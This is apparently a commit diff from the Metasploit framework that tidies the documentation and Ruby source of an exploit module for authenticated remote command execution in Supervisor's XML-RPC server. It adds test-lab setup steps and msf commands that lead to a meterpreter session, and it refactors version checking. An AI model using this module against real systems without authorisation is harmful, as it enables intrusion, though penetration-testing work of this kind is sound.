cleaned up version, and docs
h00die
parent
3b745bd17c
commit
9528f279a5
|
|
@ -4,25 +4,51 @@
|
|||
|
||||
This has been tested with versions 3.2.0 and 3.3.2
|
||||
|
||||
### Creating A Testing Environment
|
||||
|
||||
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
|
||||
|
||||
1. ```sudo apt-get install supervisor```
|
||||
2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
|
||||
|
||||
```
|
||||
[inet_http_server] ; inet (TCP) server disabled by default
|
||||
port=:9001 ; ip_address:port specifier, *:port for all iface
|
||||
username=user ; default is no username (open server)
|
||||
password=123 ; default is no password (open server)
|
||||
```
|
||||
|
||||
3. Restart the service: `sudo service supervisor restart`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. ```msf > use exploit/linux/http/supervisor_xmlrpc_exec```
|
||||
2. ```msf > set lhost 192.168.0.2```
|
||||
3. ```msf > set rhost 192.168.0.19```
|
||||
4. ```msf > set httpusername user``` (optional)
|
||||
5. ```msf > set httppassword 123``` (optional)
|
||||
6. ```msf > exploit```
|
||||
1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
|
||||
2. ```set lhost [IP]```
|
||||
3. ```set rhost [IP]```
|
||||
4. ```set httpusername user```
|
||||
5. ```set httppassword 123```
|
||||
6. ```exploit```
|
||||
7. A meterpreter session should have been opened successfully
|
||||
|
||||
## Options
|
||||
|
||||
- `HttpUsername` - Username for HTTP basic auth (optional)
|
||||
- `HttpPassword` - Password for HTTP basic auth (optional)
|
||||
- `TARGETURI` - The path to the XML-RPC endpoint
|
||||
**HttpUsername**
|
||||
|
||||
Username for HTTP basic auth which is set in the conf file(optional)
|
||||
|
||||
**HttpPassword**
|
||||
|
||||
Password for HTTP basic auth which is set in the conf file(optional)
|
||||
|
||||
**TARGETURI**
|
||||
|
||||
The path to the XML-RPC endpoint
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
### Supervisor 3.2.0 on Xubuntu 16.04
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/supervisor_xmlrpc_exec
|
||||
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
|
||||
httpusername => user
|
||||
|
|
|
|||
|
|
@ -5,7 +5,7 @@
|
|||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
|
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
|
||||
can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
|
||||
The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
|
||||
may be root. This vulnerability can only be exploited by an authenticated client or if supervisord has been
|
||||
may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
|
||||
configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
@ -59,12 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
end
|
||||
|
||||
def check_version(version_match)
|
||||
maj = version_match[2]
|
||||
min = version_match[3]
|
||||
patch = version_match[5]
|
||||
|
||||
if maj.to_i == 3 and (patch.nil? or patch.to_i < 3)
|
||||
def check_version(version)
|
||||
if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
|
||||
return true
|
||||
else
|
||||
return false
|
||||
|
|
@ -73,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
|
||||
print_status("Extracting version from web interface..")
|
||||
print_status('Extracting version from web interface..')
|
||||
|
||||
params = {
|
||||
'method' => 'GET',
|
||||
|
|
@ -87,17 +83,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
if res
|
||||
if res.code == 200
|
||||
match = res.body.match(/<span>((\d+)\.([\dab]+)(\.(\d+))?)<\/span>/)
|
||||
match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
|
||||
if match
|
||||
if check_version(match)
|
||||
print_good("Vulnerable version found: #{match[1]}")
|
||||
version = Gem::Version.new(match[1])
|
||||
if check_version(version)
|
||||
print_good("Vulnerable version found: #{version}")
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
print_bad("Version #{match[1]} is not vulnerable")
|
||||
print_bad("Version #{version} is not vulnerable")
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
else
|
||||
print_bad("Could not extract version number from web interface")
|
||||
print_bad('Could not extract version number from web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
elsif res.code == 401
|
||||
|
|
@ -108,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
else
|
||||
print_bad("Error connecting to web interface")
|
||||
print_bad('Error connecting to web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
|
@ -163,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
|
||||
end
|
||||
else
|
||||
print_good("Request returned without status code, usually indicates success. Passing to handler..")
|
||||
print_good('Request returned without status code, usually indicates success. Passing to handler..')
|
||||
handler
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue